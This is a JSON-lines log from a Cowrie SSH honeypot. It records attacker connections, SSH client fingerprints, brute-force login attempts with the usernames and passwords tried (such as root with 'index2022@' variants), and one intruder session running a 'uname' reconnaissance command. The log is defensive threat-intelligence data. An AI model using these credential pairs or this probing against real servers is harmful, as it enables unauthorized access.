{"eventid":"cowrie.session.closed","duration":12.93711519241333,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:48:10.699135Z","src_ip":"212.227.125.160","session":"b7d8ed4701b7"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":33432,"dst_ip":"1.2.3.4","dst_port":22,"session":"59b88809f425","protocol":"ssh","message":"New connection: 212.227.125.160:33432 (1.2.3.4:22) [session: 59b88809f425]","sensor":"my-vps","timestamp":"2025-08-28T08:48:22.246003Z"}
{"eventid":"cowrie.session.closed","duration":"0.3","message":"Connection lost after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:48:22.529691Z","src_ip":"212.227.125.160","session":"59b88809f425"}
{"eventid":"cowrie.session.connect","src_ip":"185.93.89.7","src_port":49866,"dst_ip":"1.2.3.4","dst_port":22,"session":"75fba8791fca","protocol":"ssh","message":"New connection: 185.93.89.7:49866 (1.2.3.4:22) [session: 75fba8791fca]","sensor":"my-vps","timestamp":"2025-08-28T08:48:26.093163Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T08:48:26.094352Z","src_ip":"185.93.89.7","session":"75fba8791fca"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-28T08:48:26.111412Z","src_ip":"185.93.89.7","session":"75fba8791fca"}
{"eventid":"cowrie.login.success","username":"root","password":"index2022@","message":"login attempt [root/index2022@] succeeded","sensor":"my-vps","timestamp":"2025-08-28T08:48:26.167291Z","src_ip":"185.93.89.7","session":"75fba8791fca"}
{"eventid":"cowrie.session.closed","duration":"0.1","message":"Connection lost after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:48:26.187455Z","src_ip":"185.93.89.7","session":"75fba8791fca"}
{"eventid":"cowrie.session.connect","src_ip":"51.79.164.132","src_port":46272,"dst_ip":"1.2.3.4","dst_port":22,"session":"f682ac28c51d","protocol":"ssh","message":"New connection: 51.79.164.132:46272 (1.2.3.4:22) [session: f682ac28c51d]","sensor":"my-vps","timestamp":"2025-08-28T08:48:33.033792Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T08:48:33.408259Z","src_ip":"51.79.164.132","session":"f682ac28c51d"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T08:48:33.409459Z","src_ip":"51.79.164.132","session":"f682ac28c51d"}
{"eventid":"cowrie.login.failed","username":"svnuser","password":"123456","message":"login attempt [svnuser/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T08:48:35.193749Z","src_ip":"51.79.164.132","session":"f682ac28c51d"}
{"eventid":"cowrie.session.connect","src_ip":"185.93.89.7","src_port":57218,"dst_ip":"1.2.3.4","dst_port":22,"session":"06ebc60e72f4","protocol":"ssh","message":"New connection: 185.93.89.7:57218 (1.2.3.4:22) [session: 06ebc60e72f4]","sensor":"my-vps","timestamp":"2025-08-28T08:48:35.654453Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T08:48:35.655159Z","src_ip":"185.93.89.7","session":"06ebc60e72f4"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-28T08:48:35.677205Z","src_ip":"185.93.89.7","session":"06ebc60e72f4"}
{"eventid":"cowrie.login.success","username":"root","password":"Index2022@","message":"login attempt [root/Index2022@] succeeded","sensor":"my-vps","timestamp":"2025-08-28T08:48:35.718923Z","src_ip":"185.93.89.7","session":"06ebc60e72f4"}
{"eventid":"cowrie.session.closed","duration":"0.1","message":"Connection lost after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:48:35.738759Z","src_ip":"185.93.89.7","session":"06ebc60e72f4"}
{"eventid":"cowrie.session.closed","duration":"3.5","message":"Connection lost after 3.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:48:36.580295Z","src_ip":"51.79.164.132","session":"f682ac28c51d"}
{"eventid":"cowrie.session.connect","src_ip":"193.32.162.145","src_port":41088,"dst_ip":"1.2.3.4","dst_port":22,"session":"ed7584773298","protocol":"ssh","message":"New connection: 193.32.162.145:41088 (1.2.3.4:22) [session: ed7584773298]","sensor":"my-vps","timestamp":"2025-08-28T08:48:54.538773Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T08:48:54.540719Z","src_ip":"193.32.162.145","session":"ed7584773298"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-28T08:48:54.570571Z","src_ip":"193.32.162.145","session":"ed7584773298"}
{"eventid":"cowrie.login.failed","username":"node","password":"solana","message":"login attempt [node/solana] failed","sensor":"my-vps","timestamp":"2025-08-28T08:48:54.662197Z","src_ip":"193.32.162.145","session":"ed7584773298"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:48:55.694344Z","src_ip":"193.32.162.145","session":"ed7584773298"}
{"eventid":"cowrie.session.connect","src_ip":"51.79.164.132","src_port":49970,"dst_ip":"1.2.3.4","dst_port":22,"session":"cf9dbf4b933a","protocol":"ssh","message":"New connection: 51.79.164.132:49970 (1.2.3.4:22) [session: cf9dbf4b933a]","sensor":"my-vps","timestamp":"2025-08-28T08:48:59.085305Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T08:48:59.168638Z","src_ip":"51.79.164.132","session":"cf9dbf4b933a"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T08:48:59.602415Z","src_ip":"51.79.164.132","session":"cf9dbf4b933a"}
{"eventid":"cowrie.login.failed","username":"dolphinscheduler","password":"123456","message":"login attempt [dolphinscheduler/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T08:49:00.987655Z","src_ip":"51.79.164.132","session":"cf9dbf4b933a"}
{"eventid":"cowrie.session.closed","duration":"3.5","message":"Connection lost after 3.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:49:02.608397Z","src_ip":"51.79.164.132","session":"cf9dbf4b933a"}
{"eventid":"cowrie.session.connect","src_ip":"185.93.89.7","src_port":47906,"dst_ip":"1.2.3.4","dst_port":22,"session":"1fdb958391a5","protocol":"ssh","message":"New connection: 185.93.89.7:47906 (1.2.3.4:22) [session: 1fdb958391a5]","sensor":"my-vps","timestamp":"2025-08-28T08:49:12.395954Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T08:49:12.397342Z","src_ip":"185.93.89.7","session":"1fdb958391a5"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-28T08:49:12.414090Z","src_ip":"185.93.89.7","session":"1fdb958391a5"}
{"eventid":"cowrie.login.success","username":"root","password":"index@2022","message":"login attempt [root/index@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-28T08:49:12.474700Z","src_ip":"185.93.89.7","session":"1fdb958391a5"}
{"eventid":"cowrie.session.closed","duration":"0.1","message":"Connection lost after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:49:12.513911Z","src_ip":"185.93.89.7","session":"1fdb958391a5"}
{"eventid":"cowrie.session.connect","src_ip":"185.93.89.7","src_port":40510,"dst_ip":"1.2.3.4","dst_port":22,"session":"08e3bad22f06","protocol":"ssh","message":"New connection: 185.93.89.7:40510 (1.2.3.4:22) [session: 08e3bad22f06]","sensor":"my-vps","timestamp":"2025-08-28T08:49:21.736986Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T08:49:21.737648Z","src_ip":"185.93.89.7","session":"08e3bad22f06"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-28T08:49:21.755955Z","src_ip":"185.93.89.7","session":"08e3bad22f06"}
{"eventid":"cowrie.login.success","username":"root","password":"Index@2022","message":"login attempt [root/Index@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-28T08:49:21.794001Z","src_ip":"185.93.89.7","session":"08e3bad22f06"}
{"eventid":"cowrie.session.closed","duration":"0.1","message":"Connection lost after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:49:21.812811Z","src_ip":"185.93.89.7","session":"08e3bad22f06"}
{"eventid":"cowrie.session.connect","src_ip":"51.79.164.132","src_port":55556,"dst_ip":"1.2.3.4","dst_port":22,"session":"ea95e940c17b","protocol":"ssh","message":"New connection: 51.79.164.132:55556 (1.2.3.4:22) [session: ea95e940c17b]","sensor":"my-vps","timestamp":"2025-08-28T08:49:25.722151Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T08:49:25.841091Z","src_ip":"51.79.164.132","session":"ea95e940c17b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":32776,"dst_ip":"1.2.3.4","dst_port":22,"session":"98b88c9b8f12","protocol":"ssh","message":"New connection: 212.227.235.229:32776 (1.2.3.4:22) [session: 98b88c9b8f12]","sensor":"my-vps","timestamp":"2025-08-28T08:49:26.131127Z"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T08:49:26.402269Z","src_ip":"51.79.164.132","session":"ea95e940c17b"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T08:49:26.700040Z","src_ip":"212.227.235.229","session":"98b88c9b8f12"}
{"eventid":"cowrie.login.success","username":"root","password":"4r3e2w1q","message":"login attempt [root/4r3e2w1q] succeeded","sensor":"my-vps","timestamp":"2025-08-28T08:49:27.856027Z","src_ip":"51.79.164.132","session":"ea95e940c17b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T08:49:28.497404Z","src_ip":"51.79.164.132","session":"ea95e940c17b"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T08:49:28.498334Z","src_ip":"51.79.164.132","session":"ea95e940c17b"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-28T08:49:28.851039Z","src_ip":"212.227.235.229","session":"98b88c9b8f12"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.6","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:49:29.132097Z","src_ip":"51.79.164.132","session":"ea95e940c17b"}
